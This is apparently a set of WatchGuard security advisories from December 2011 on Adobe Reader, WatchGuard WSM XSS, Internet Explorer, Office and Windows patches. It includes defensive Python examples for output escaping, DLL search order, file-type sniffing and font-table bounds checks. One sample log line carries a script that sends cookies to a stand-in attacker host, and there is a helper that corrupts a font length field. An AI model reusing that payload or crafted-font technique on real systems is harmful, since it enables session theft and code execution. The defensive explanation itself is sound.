Impact: An attacker can execute code on your computer, potentially gaining control of it

What to do: Windows users should install Adobe’s Reader and Acrobat 9.4.7 updates as soon as possible (or let Adobe’s Updater do it for you).

Exposure:

In a previous post, we warned you that attackers are currently leveraging a zero day vulnerability in Adobe Reader to launch targeted attacks against certain industries. The attack arrives as a targeted phishing email, which contains a specially crafted PDF file. If you open that PDF file, it leverages the previously unknown vulnerability to execute code on your computer, with your privileges.

Adobe promised they’d release a patch for this zero day this week, and they did so today. According to their security bulletin, this out-of-cycle update actually corrects two security vulnerabilities, which attackers have exploited in the wild. As is typically the case with Adobe, they don’t describe the flaws in much technical detail, but they do say they involve memory corruption issues in the U3D and PRC components of Reader and Acrobat. As I mentioned before, if an attacker can entice you into opening a specially crafted PDF file, he can exploit these issues to execute code with your privileges. If you have root or system administrator privileges, the attacker gains complete control of your machine.

Solution Path

Adobe has released Windows Reader and Acrobat 9.4.7 to fix these vulnerabilities on Windows systems. Though Reader versions running on other platforms (such as Macintosh and Unix) are also susceptible to these issues, Adobe does not plan to patch them until their next quarterly update, scheduled for January 10, 2012.

It’s important to note that the more recent Reader and Acrobat X (10.1.1) versions are also vulnerable to these issues. However, Adobe does not believe attackers can exploit these flaws in the X versions due to built-in protection mechanisms. Nonetheless, they will also release Reader X updates in January.

In the meantime, Windows-based Reader and Acrobat 9.x users should download and install the following updates as soon as they can, or let Adobe’s updater do it for you.

For All WatchGuard Users:

Many WatchGuard Firebox models can block incoming PDF files. However, most administrators prefer to allow these file types for business purposes. Nonetheless, if PDF files are not absolutely necessary to your business, you may consider blocking them using the Firebox’s HTTP and SMTP proxy until the patch has been installed.

Keep in mind, our Gateway Antivirus (GAV) service does also scan PDF files for malware. In many cases, simply enabling our GAV service will protect you from these well known, public threats.

If you decide you want to block PDF documents, follow the links below for instructions on using your Firebox proxy’s content blocking features to block .pdf files by their file extension:


Severity: High

15 December, 2011

Summary:

This vulnerability affects: WatchGuard System Manager (WSM) v11.5.1

How an attacker exploits it: Multiple vectors of attack, including enticing you to click a maliciously crafted link, or sending specially crafted network traffic through an XTM appliance and having you view the resulting logs in our Web UI

Exposure:

A few weeks ago, WatchGuard released Fireware XTM OS and WatchGuard System Manager (WSM) v11.5.1. Among other things, this release includes a newly designed Log and Report Manager Web UI, which greatly improves our logging and reporting interface, making it dramatically faster and easier to use.

However, shortly after the release of WSM v11.5.1, we learned of two privately reported and two internally discovered security issues that affect our Log and Report Manager Web UI. WSM v11.5.1 Update 1 fixes all four of those security issues. We describe these issues in a bit more detail below:

The Log and Report Manager Web UI does not properly sanitize log data it retrieves from the log database, before displaying it in the Web UI. By sending specially crafted traffic through your XTM appliance (such as maliciously crafted email or FTP connections), an attacker can fill your logs with messages that contain malicious web script. When you view these logs within the Log and Report Manager Web UI, they could trigger a Cross-Site Scripting (XSS) vulnerability, which allows the attacker to execute scripts in your web browser under the context of our Web UI. Since these malicious logs would remain in your log database until you specifically deleted them, this flaw is a persistent XSS vulnerability.

In general, attackers can leverage XSS attacks to steal your web cookies, hijack your web sessions, redirect you to malicious sites, or essentially take any action you could on the vulnerable web site. In some cases, attackers can even leverage XSS attacks to hijack your web browser, and gain unauthorized access to your computer. That said, a few factors somewhat mitigate the severity of this issue. In order to exploit this flaw, an attacker would have to know you manage a WSM server with v11.5.1. He’d also have to send very specially crafted traffic through your XTM appliance, which would need policies that allow such traffic. Finally, though this attack may allow the attacker to gain elevated privilege in your web browser, it would not give the attacker access to your XTM appliance, or the ability to change firewall rules. Nonetheless, we consider this a fairly serious vulnerability, and recommend you update as soon as you can. We’d like to thank Wayne Murphy of Sec-1 for bringing this flaw to our attention.

The Log and Report Manager Web UI also does not properly sanitize inputs entered into certain URL parameters. By enticing you to click a specially crafted link, or by intercepting and modifying URL parameters, an attacker could exploit this flaw to trigger another XSS vulnerability. The impact of this flaw is the same as the one described above; an attacker can leverage it to steal web cookies, hijack your web session, or essentially take any action you could in the Log and Report Web UI. This is a reflected XSS flaw, since the attack only occurs once, when you click the malicious link.

Like the flaw described above, an attacker would first have to know you manage an XTM appliance with WSM v11.5.1 to exploit this flaw. Furthermore, the attacker would then need to entice you to click a malicious link, which makes this XSS vulnerability slightly less severe than the one described above. Again, we’d like to thank Wayne Murphy of Sec-1 for bringing this flaw to our attention.
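Both flaws above share one root cause: untrusted text (a log record pulled from the database, or a query-string value) is written into the page without HTML escaping. The following example is added here to illustrate that class of bug and its fix; it is not WatchGuard code and does not reproduce the Log and Report Manager UI. The log lines, the `wsm.example` URL and the `evil.invalid` host are constructed for the demonstration.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log entries, as a log database might hold them after an
# attacker pushed crafted SMTP and FTP sessions through the firewall. The
# second line carries a script payload in the FTP user name field.
SAMPLE_LOGS = [
    'smtp-proxy: sender="bob@example.org" subject="Q4 report"',
    'ftp-proxy: user="<script>new Image().src=\'http://evil.invalid/?c=\'+document.cookie</script>"',
    'http-proxy: host="example.org" path="/index.html"',
]

# Heuristic for triaging stored logs: tags and attributes that can run script.
SCRIPT_MARKERS = re.compile(
    r"<\s*/?\s*(script|img|svg|iframe|object|embed)\b|javascript:|\bon\w+\s*=", re.I
)


def render_row_unsafe(entry: str) -> str:
    """The vulnerable pattern: a log string concatenated straight into the page."""
    return f"<tr><td>{entry}</td></tr>"


def render_row_safe(entry: str) -> str:
    """The fix: HTML-escape every untrusted string at the point it is emitted."""
    return f"<tr><td>{html.escape(entry, quote=True)}</td></tr>"


def find_suspicious_log_entries(entries):
    """Return (index, entry) pairs whose text contains script markers.

    Handy for checking whether someone has already tried to seed a log store
    that an unpatched UI would later render (the persistent variant)."""
    return [(i, e) for i, e in enumerate(entries) if SCRIPT_MARKERS.search(e)]


def reflected_param_safe(url: str, param: str) -> str:
    """Reflected variant: read a query-string value and escape it before echoing it."""
    value = parse_qs(urlsplit(url).query).get(param, [""])[0]
    return html.escape(value, quote=True)
```

The marker regex is a triage aid, not a filter: output encoding (`render_row_safe`, `reflected_param_safe`) is the actual fix, because a denylist of tags can always be bypassed by a variant it does not list.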

Severity: Medium

Two Low-Severity Nessus-Reported Vulnerabilities

Our own internal tests identified two minor security issues in our Log and Report Web UI, which were reported by Nessus scans. You can learn more about these issues from the links provided below:

In both cases, your WSM server is protected by your XTM appliance, making it unlikely that an external attacker could exploit either of these minor flaws. We believe they pose very low risk, but still recommend you apply Update 1 as soon as you can.

Severity: Low

Solution Path:

WSM v11.5.1 Update 1 fixes all four of these security issues. XTM appliance administrators who have installed WSM v11.5.1 should download and install Update 1 at their earliest convenience.

FAQ:

Are any of WatchGuard’s other products affected?

No. To our knowledge, these vulnerabilities only affect the new WSM v11.5.1 Log and Report Manager Web UI.

What exactly are the vulnerabilities?

The worst of these four vulnerabilities are the Cross-Site Scripting (XSS) vulnerabilities, which can allow attackers to execute scripts in your web browser under the context of our Web UI. In general, attackers can leverage XSS attacks to steal your web cookies, hijack your web sessions, redirect you to malicious sites, or essentially take any action you could on the vulnerable web site. In some cases, attackers can even leverage XSS attacks to hijack your web browser, and gain unauthorized access to your computer. However, attackers cannot leverage these flaws to gain access to your XTM appliance or change firewall rules.

How serious is the vulnerability?

We believe the two XSS vulnerabilities are fairly serious. However some mitigating factors will likely limit attackers from exploiting these flaws in the real world. In general, XSS flaws can be very dangerous. Tools like the Browser Exploitation Framework (BeEF) have illustrated that attackers can leverage simple XSS flaws to gain significant control of your browser, and possibly your computer. That said, attackers would have to know a lot about you and your organization to exploit these particular XSS vulnerabilities. Specifically, they’d have to know you manage a WSM v11.5.1 server, and either get you to click a link, or view a specific log message in our Web UI. This would likely only happen in a very targeted attack. Furthermore, these flaws would not give the attacker access to your XTM appliance. That said, as a security company, WatchGuard takes any vulnerability in our products very seriously. We suggest you install WSM v11.5.1 Update 1 as soon as possible.

Other than installing Update 1, is there a workaround?

Not really. Obviously, if you avoid clicking malicious phishing links, an attacker couldn’t exploit the reflected XSS flaw. However, even the most savvy security professional sometimes clicks the wrong link. If you do not allow any incoming traffic through your XTM appliance, then an attacker may not be able to booby-trap your log files with specially crafted messages. However, most organizations have policies that at least allow email traffic, and that alone could allow an external attacker to corrupt your logs. We highly recommend you install WSM v11.5.1 Update 1 to correct these issues.

Where can I go to get the hotfix?

WSM 11.5.1 Update 1 is currently available in the Articles & Software section of WatchGuard’s Support Center. Look for it under the Management Software section for your XTM appliance.

How was this vulnerability discovered?

Two of these vulnerabilities were discovered by Wayne Murphy of Sec-1 (@Sec1Ltd), and confidentially reported to WatchGuard. We thank Mr. Murphy for working with us to keep our customers secure. The remaining issues were discovered internally.

Do you have any indication that this vulnerability is being exploited in the wild?

No, at this time we have no indication that these vulnerabilities are being exploited in the wild, nor do we believe them likely to be in the future.

Who can I contact at WatchGuard if I have more questions?

If you have further questions about this issue, or any other security concerns with WatchGuard products, please contact:

Severity: Medium

Summary:

This vulnerability affects: All current versions of Internet Explorer, running on all current versions of Windows

How an attacker exploits it: Typically, by enticing one of your users to visit a malicious web page

Impact: Various, in the worst case an attacker can execute code on your user’s computer, gaining complete control of it

What to do: Deploy the appropriate Internet Explorer patches immediately, or let Windows Automatic Update do it for you

Exposure:

In a security bulletin released today as part of Patch Day, Microsoft describes three new vulnerabilities in Internet Explorer (IE) 9.0 and earlier versions, running on all current versions of Windows. Microsoft rates the aggregate severity of these new flaws as Important.

The most severe of these three new IE vulnerabilities is another insecure Dynamic Link Library (DLL) loading vulnerability, similar to the ones we’ve described in many previous Microsoft alerts. In a nutshell, this class of flaw involves an attacker enticing one of your users into opening some sort of booby-trapped file from the same location as a specially crafted, malicious DLL file. If you do open the booby-trapped file, it will execute code in the malicious DLL file with your privileges. If you have local administrative privileges, the attacker could exploit this type of issue to gain complete control of your computer. In this particular case, the vulnerability is triggered specifically by HTML files.

In most cases, an attacker would have trouble exploiting this insecure library loading vulnerability over a network or the Internet. Typically, he’d have to entice you to download and save both an HTML file and a DLL file to the same folder (your desktop, for example), then open the HTML file, which significantly mitigates the risk of the attack. Theoretically, an attacker could exploit it over a network using UNC or WebDAV locations if he can convince you to add those locations to your Windows PATH. However, that is unlikely as well.
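To make the “same folder” condition concrete, the following example is added here (it is not Microsoft code and says nothing about which DLL this particular bulletin concerns). It models the default SafeDllSearchMode lookup order for a DLL that an application loads by bare name, and shows why a DLL planted next to the opened document wins only when no copy exists in the application or system directories, and how a UNC entry in PATH extends the same trick over the network. The directory names and the DLL name `example.dll` are constructed for the demonstration.

```python
from pathlib import PureWindowsPath

SYSTEM32 = r"C:\Windows\System32"
SYSTEM16 = r"C:\Windows\System"
WINDIR = r"C:\Windows"


def search_order(app_dir, cwd, path_env, cwd_in_search=True):
    """LoadLibrary("name.dll") lookup order with SafeDllSearchMode on (the default).

    cwd_in_search=False models the CWDIllegalInDllSearch hardening (KB2264107),
    which drops the current directory from the search."""
    order = [app_dir, SYSTEM32, SYSTEM16, WINDIR]
    if cwd_in_search:
        order.append(cwd)
    return order + [p for p in path_env.split(";") if p]


def resolve_dll(name, present_files, app_dir, cwd, path_env, cwd_in_search=True):
    """Return the first candidate that exists (case-insensitive), or None."""
    present = {f.lower() for f in present_files}
    for d in search_order(app_dir, cwd, path_env, cwd_in_search):
        candidate = str(PureWindowsPath(d) / name)
        if candidate.lower() in present:
            return candidate
    return None


# Constructed scenario: the victim saved report.html and the attacker's DLL
# into the same Downloads folder, which becomes the current directory when
# the HTML file is opened. "example.dll" is a hypothetical name.
IE_DIR = r"C:\Program Files\Internet Explorer"
DOWNLOADS = r"C:\Users\alice\Downloads"
PLANTED_DLL = "example.dll"
PATH_ENV = SYSTEM32 + ";" + WINDIR

VICTIM_FILES = [
    IE_DIR + r"\iexplore.exe",
    DOWNLOADS + r"\report.html",
    DOWNLOADS + "\\" + PLANTED_DLL,
]


def planted_dll_wins(cwd_in_search=True):
    """True when the copy in the document folder is the one that would load."""
    hit = resolve_dll(PLANTED_DLL, VICTIM_FILES, IE_DIR, DOWNLOADS, PATH_ENV, cwd_in_search)
    return hit is not None and hit.lower().startswith(DOWNLOADS.lower())
```

The model also shows the defender’s two levers: a DLL that the application ships in its own directory, or that lives in System32, is found before the current directory is ever consulted, and removing the current directory from the search (or never adding UNC paths to PATH) closes the remaining window.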

The remaining vulnerabilities consist of a less severe Cross-Site or Cross-Domain Scripting (XSS) flaw and an information disclosure issue. Among other things, an attacker might leverage the XSS vulnerability to view information (such as cookies) from another domain or site that he shouldn’t have access to, or to execute scripts with another domain or site’s privileges. Keep in mind, today’s attackers commonly hijack legitimate web pages and booby-trap them with malicious code, typically via hosted web ads or through SQL injection and XSS attacks. Even recognizable and authentic websites could pose a risk to your users if hijacked in this way.

Solution Path:

These patches fix serious issues. You should download, test, and deploy the appropriate IE patches immediately, or let Windows Automatic Update do it for you.


Summary:

These vulnerabilities affect: Most current versions of Microsoft Office for Windows and Mac, and related products like Publisher

How an attacker exploits them: Typically, by enticing you to open maliciously crafted Office documents

Impact: An attacker can execute code, potentially gaining complete control of your computer

What to do: Install the appropriate Office patches as soon as possible, or let Windows Update do it for you.

Exposure:

Today, Microsoft released five security bulletins describing nine vulnerabilities found in Microsoft Office for Windows and Mac, including related products like Microsoft Publisher and other Office components. The specific affected Office applications and components include:

Word

Excel

PowerPoint

Publisher

the optional Office Input Method Editor (IME) for Pinyin Chinese

Four of the five Office bulletins describe various code execution vulnerabilities, which all involve the way Office, and its many applications, handle different types of documents. These document handling flaws differ technically, but share the same general scope and impact. By enticing one of your users into downloading and opening a maliciously crafted Office document, an attacker can exploit any of these vulnerabilities to execute code on that user’s computer, usually inheriting that user’s level of privileges and permissions. If your user has local administrative privileges, the attacker gains full control of the user’s machine.

The only difference of note between these flaws is which type of Office document attackers can use to trigger them. The affected Office document types include Word, PowerPoint, Excel, and Publisher files.

The fifth Office security bulletin describes a slightly less severe security vulnerability that only affects a smaller subset of Office users. The flaw specifically lies in the optional Input Method Editor (IME) for Pinyin Chinese. IMEs are optional components that allow Latin keyboard users to type non-Latin characters in Office or Windows. Unfortunately, the Office IME for Pinyin Chinese suffers from an elevation of privilege (EoP) vulnerability. If an attacker can gain local access to your computer using valid Windows credentials, she could run a specially crafted program that would give her full SYSTEM-level privileges on your computer. Of course, the attack only affects those who’ve specifically installed the Pinyin Chinese Office IME, and the attacker must have a valid login to exploit the issue.

If you’d like to learn more about each individual flaw, drill into the “Vulnerability Details” section of the security bulletins listed below:

Solution Path

Microsoft has released patches for Office to correct all of these vulnerabilities. You should download, test, and deploy the appropriate patches throughout your network as soon as possible, or let Windows Automatic Update do it for you.

For All WatchGuard Users:

Many WatchGuard appliances can block incoming Office documents. However, most administrators prefer to allow these file types for business purposes. Nonetheless, if Office documents are not absolutely necessary to your business, you may consider blocking them using our proxies, at least until you install these patches.

If you would like to use our XTM and Firebox appliance’s proxy policies to block the affected documents, follow the links below for general instructions:
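The PDF and Office blocking advice in this and the Adobe post above both rely on matching the file extension. The following example is added here to show what an extension-only rule misses and how content-based classification closes that gap; it is not Firebox or XTM configuration and not WatchGuard code, and the sample bytes it classifies are constructed inline. It recognizes the three containers the affected document types actually use: `%PDF-` for PDF, the OLE2 compound-file signature for legacy .doc/.xls/.ppt/.pub, and a ZIP archive carrying `[Content_Types].xml` for the OOXML formats.

```python
import io
import zipfile

OLE2_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
ZIP_MAGIC = b"PK\x03\x04"

DOCUMENT_TYPES = {"pdf", "ole2", "docx", "xlsx", "pptx", "ooxml"}
DOCUMENT_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "pub"}


def sniff_document_type(data: bytes) -> str:
    """Classify a byte string by its leading bytes and container, not by its name."""
    if data.startswith(b"%PDF-"):
        return "pdf"
    if data.startswith(OLE2_MAGIC):
        return "ole2"  # legacy binary Office formats share one compound-file container
    if data.startswith(ZIP_MAGIC):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                names = set(zf.namelist())
        except zipfile.BadZipFile:
            return "zip-corrupt"
        if "[Content_Types].xml" not in names:
            return "zip"
        for prefix, kind in (("word/", "docx"), ("xl/", "xlsx"), ("ppt/", "pptx")):
            if any(n.startswith(prefix) for n in names):
                return kind
        return "ooxml"
    return "unknown"


def should_block(filename: str, data: bytes) -> bool:
    """Block on content type OR extension, so a renamed document does not slip through."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return sniff_document_type(data) in DOCUMENT_TYPES or ext in DOCUMENT_EXTENSIONS


def make_ooxml_sample(part_prefix: str) -> bytes:
    """Build a minimal constructed OOXML-style archive for testing the classifier."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr(part_prefix + "document.xml", "<doc/>")
    return buf.getvalue()
```

The practical lesson: an attacker who renames `invoice.pdf` to `invoice.txt` defeats an extension rule but not a magic-byte check, which is why gateway antivirus and proxies that inspect content remain the stronger control while the client patch is pending.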

Severity: High

Summary:

These vulnerabilities affect: All current versions of Windows and components that ship with it

How an attacker exploits them: Multiple vectors of attack including enticing your users to malicious web sites, or into opening booby-trapped files

Impact: Various results; in the worst case, an attacker can gain complete control of your Windows computer

What to do: Install the appropriate Microsoft patches immediately, or let Windows Automatic Update do it for you.

Exposure:

Today, Microsoft released seven security bulletins describing the same number of vulnerabilities affecting Windows and components that ship with it. Each vulnerability affects different versions of Windows to varying degrees. However, a remote attacker could exploit the worst of these flaws to gain complete control of your Windows PC. The summary below lists the vulnerabilities, in order from highest to lowest severity.

The kernel is the core component of any computer operating system. Windows also ships with a kernel-mode device driver (win32k.sys) that implements the kernel side of the Windows graphical subsystem, including font rendering. This driver suffers from an input validation vulnerability involving its inability to properly parse TrueType fonts. By enticing one of your users to visit a malicious web site, open a specially crafted document, or run an evil program, an attacker could exploit this flaw to gain complete control of your Windows computer. Attackers are currently exploiting this vulnerability in the wild with the Duqu malware. Duqu typically arrives as a spear-phishing email with a malicious Office document attachment. The attachment leverages this TrueType handling vulnerability to install the Duqu malware onto your computer. We highly recommend you apply this patch as quickly as you can.
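Microsoft’s bulletin does not say which TrueType structure the driver fails to validate, so the following example is added here only to show what “input validation of a font file” means at the outermost layer, the sfnt table directory every TrueType font begins with. It is not Microsoft code and does not reproduce the Duqu exploit. The parser checks every table offset and length against the buffer before trusting them, and the helper that corrupts a length field shows the kind of edit a malicious font makes; the font blob it builds is constructed for the demonstration, and the 64-table ceiling is an assumption chosen for the example.

```python
import struct

# sfnt offset table: sfntVersion, numTables, searchRange, entrySelector, rangeShift
OFFSET_TABLE = struct.Struct(">IHHHH")
# table record: tag, checksum, offset, length
TABLE_RECORD = struct.Struct(">4sIII")
MAX_TABLES = 64  # assumption for this example; real fonts have far fewer tables


class FontParseError(ValueError):
    pass


def parse_table_directory(data: bytes) -> dict:
    """Parse the sfnt table directory, rejecting any record that points outside the file."""
    if len(data) < OFFSET_TABLE.size:
        raise FontParseError("file too short for an offset table")
    version, num_tables, *_ = OFFSET_TABLE.unpack_from(data, 0)
    if version not in (0x00010000, 0x74727565):  # 1.0, or 'true' on older Mac fonts
        raise FontParseError(f"unexpected sfnt version {version:#x}")
    if num_tables == 0 or num_tables > MAX_TABLES:
        raise FontParseError(f"implausible table count {num_tables}")
    dir_end = OFFSET_TABLE.size + num_tables * TABLE_RECORD.size
    if dir_end > len(data):
        raise FontParseError("table directory runs past end of file")
    tables = {}
    for i in range(num_tables):
        pos = OFFSET_TABLE.size + i * TABLE_RECORD.size
        tag, _checksum, offset, length = TABLE_RECORD.unpack_from(data, pos)
        # Python ints do not wrap, so offset + length is safe here; a C parser
        # must instead test `length > len(data) - offset` to avoid integer overflow.
        if offset < dir_end or offset + length > len(data):
            raise FontParseError(
                f"table {tag!r} lies outside the file (offset={offset}, length={length})"
            )
        tables[tag.decode("ascii", "replace")] = (offset, length)
    return tables


def is_well_formed(data: bytes) -> bool:
    try:
        parse_table_directory(data)
        return True
    except FontParseError:
        return False


def build_font(tables: dict) -> bytes:
    """Construct a minimal sfnt blob from {tag: payload}; test scaffolding only."""
    num = len(tables)
    header = OFFSET_TABLE.pack(0x00010000, num, 0, 0, 0)
    body_start = OFFSET_TABLE.size + num * TABLE_RECORD.size
    records, body = b"", b""
    for tag, payload in tables.items():
        records += TABLE_RECORD.pack(tag, 0, body_start + len(body), len(payload))
        body += payload + b"\0" * (-len(payload) % 4)  # tables are 4-byte aligned
    return header + records + body


def corrupt_table_length(data: bytes, index: int, new_length: int) -> bytes:
    """Rewrite one record's length field, as a crafted font would, leaving the rest intact."""
    pos = OFFSET_TABLE.size + index * TABLE_RECORD.size
    tag, checksum, offset, _ = TABLE_RECORD.unpack_from(data, pos)
    patched = TABLE_RECORD.pack(tag, checksum, offset, new_length)
    return data[:pos] + patched + data[pos + TABLE_RECORD.size:]
```

The directory is only the first of many length-prefixed structures in a font (glyph data, cmap subtables, hinting programs), and each needs the same bound check; a parser that trusts any one of them is exactly the shape of flaw a malicious document can reach from the kernel-mode driver.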

This bulletin fixes a remote code execution vulnerability in Windows’ Microsoft Time component. Microsoft does not describe the Time component flaw in much detail. They only say that it has to do with an improper use of the Time component’s “binary behavior,” which could corrupt your system state in a way that may allow attackers to execute code and gain complete control of your computer. To do so, the attacker would first have to entice you to a specially crafted web site, or to a legitimate site that he booby-trapped with malicious code. Finally, though the flaw affects a Windows component, it also involves the way Internet Explorer (IE) interacts with that component. Luckily, only IE 6 and below are susceptible to this flaw. If you are running a more recent version of IE, you should be safe. That said, we still recommend you update the underlying, flawed Windows Time component.

Some versions of Windows (XP, Vista, and 7) ship with Media Player and Media Center, both programs that help you organize and play your multimedia content (audio, video, etc.). Media Player suffers from a memory corruption vulnerability, involving its inability to properly handle specially crafted Microsoft Digital Video Recording (.dvr-ms) media files. By enticing one of your users to open a specially crafted .dvr-ms file, an attacker can exploit this vulnerability to execute malicious code with that user’s privileges. If your users have local administrative privileges, the attacker could gain complete control of their computers.

Object Linking and Embedding (OLE) is a protocol that allows Windows to handle special compound documents, which contain embedded links to content from other document types, in other formats. OLE suffers from an unspecified object handling vulnerability, involving its inability to properly handle specially crafted OLE objects within documents. By tricking one of your users into opening a specially crafted document, an attacker could exploit this flaw to execute code on that user’s computer, with that user’s privileges. If your users have local administrative privileges, the attacker gains complete control of their machines. All Microsoft Office documents, as well as many third-party files, can contain OLE objects, which attackers can use to exploit this flaw.

Active Directory (AD) provides central authentication and authorization services for Windows computers and ships with server versions of Windows. AD suffers from a buffer overflow vulnerability involving its inability to handle specially crafted queries. By running a specially crafted program, a local attacker can exploit this flaw to execute code on your AD server, gaining complete control of it. However, the attacker would need valid domain user credentials to leverage this flaw, which significantly mitigates its severity. This vulnerability primarily poses an internal threat.

The Client/Server Run-time SubSystem (CSRSS) is an essential Windows component responsible for console windows and creating and deleting threads. By running a specially crafted application, an attacker can leverage this flaw to elevate his privilege (EoP), gaining complete, SYSTEM-level control of your Windows machine. However, in order to run his special program, the attacker would first need to gain local access to your Windows computers using valid credentials. This factor significantly reduces the risk of this flaw.

The kernel is the core component of any computer operating system. The Windows kernel suffers from an Elevation of Privilege (EoP) vulnerability. Like the CSRSS flaw above, by running a specially crafted program, an authenticated attacker could leverage this flaw to gain complete control of your Windows computers. However, like before, the attacker would first need to gain local access to your Windows computers using valid credentials, which somewhat reduces the risk of this flaw. This flaw does not affect the 64-bit or Itanium editions of Windows.

Microsoft rating: Important

Solution Path:

Microsoft has released patches for Windows which correct all of these vulnerabilities. You should download, test, and deploy the appropriate patches throughout your network immediately. If you choose, you can also let Windows Update automatically download and install these for you.

For All WatchGuard Users:

Attackers can exploit these flaws using diverse exploitation methods. A properly configured firewall can mitigate the risk of some of these issues. Furthermore, WatchGuard’s proxy policies can block some of the content necessary to exploit some of these flaws. That said, our appliances cannot protect you from local attacks, nor can they prevent attacks that leverage normal HTTP traffic. Therefore, installing Microsoft’s updates is your most secure course of action.


Santa Microsoft has come to town with a bag full of software updates for all the nice Windows administrators out there. I recommend you download, test, and install them as soon as possible. That way you can enjoy a merry, stress-free, and secure Christmas this year.

According to their summary post, Microsoft released 13 security bulletins today — one less than the 14 they originally intended. The bulletins cover flaws in Windows and its components, Office and related products, and Internet Explorer (IE). Microsoft rates three of the bulletins as Critical.

As is often the case, the Critical Microsoft bulletins fix vulnerabilities that remote attackers could exploit to execute malicious code on your machine, with little user interaction. One of the Critical updates, MS11-087, fixes the zero day kernel-mode driver vulnerability that attackers have leveraged in the wild via the well-publicized Duqu malware. Though attackers seem to have only leveraged this malware in limited, highly-targeted attacks, I still recommend you patch it first. In fact, you should probably focus on applying all of Microsoft’s three Critical updates quickly, followed by the Important ones.

You can learn more about today’s updates in Microsoft’s December summary bulletin. As is normally the case with Microsoft updates, I suggest you test the patches before deploying them in your production network — especially the ones that affect server software.

According to ComputerWorld and Symantec, attackers are currently leveraging a zero day vulnerability in Adobe Reader in targeted attacks against telecommunications, manufacturing, computer hardware, and chemical companies, as well as defence sector organisations like Lockheed Martin.

The attacks may have started as early as the beginning of November, and arrive as a targeted phishing email with a malicious PDF attachment. If you open said attachment, your computer gets infected with information stealing malware.

Earlier this week, Adobe confirmed this zero day flaw in a Security Advisory. The vulnerability affects all current versions of Reader and Acrobat running on any platform. Though they have not released a fix for the flaw yet, they plan to sometime next week.

Until then, we highly recommend that you inform your users to be very careful handling PDF files that come from outside your organization, whether from a trusted source or not. If you have one of our security appliances, you can also use our proxy policies to strip all PDF content if you like. That said, doing so blocks both legitimate and malicious PDF files. Also, be sure to keep both your gateway and client level antivirus software up to date, as it likely has signatures to block known variants of this attack.

As soon as Adobe releases an update to fix this issue, we will let you know in a follow-up post.

[UPDATE]:

There have also been reports of a Russian research team unveiling two zero day vulnerabilities in Adobe’s Flash Player as well. This team has no plans of informing Adobe, as they don’t believe in disclosing bugs for free. Adobe has not responded to these reports yet, but we will update you on these issues as well, as they develop. In the meantime, you can read more about these reported flaws here. — Corey Nachreiner, CISSP (@SecAdept)


Microsoft seems to have the Christmas giving spirit this month, as they intend to release 14 new security bulletins during next Tuesday’s Patch Day. The bulletins fix a total of 20 security vulnerabilities in products like Windows, Office, and Internet Explorer, as well as other components that ship with those products. They rate three of the bulletins as Critical, and the rest as Important, and you can expect most of the updates to require a restart.

Of particular note; one of the bulletins will fix the zero day Windows kernel vulnerability used by the well publicized Duqu malware, which we described in a previous post.

You can find a bit more about these upcoming bulletins, including their order of severity, in Microsoft’s Advanced Notification post for December. As usual, I recommend you try to install these updates as quickly as possible, especially the Critical ones. I also recommend you test Microsoft patches before deploying them, especially when applying them to production servers.

I’ll know more about these bulletins on Tuesday, December 13. Check out the WatchGuard Security Center then for our latest updates. — Corey Nachreiner, CISSP (@SecAdept)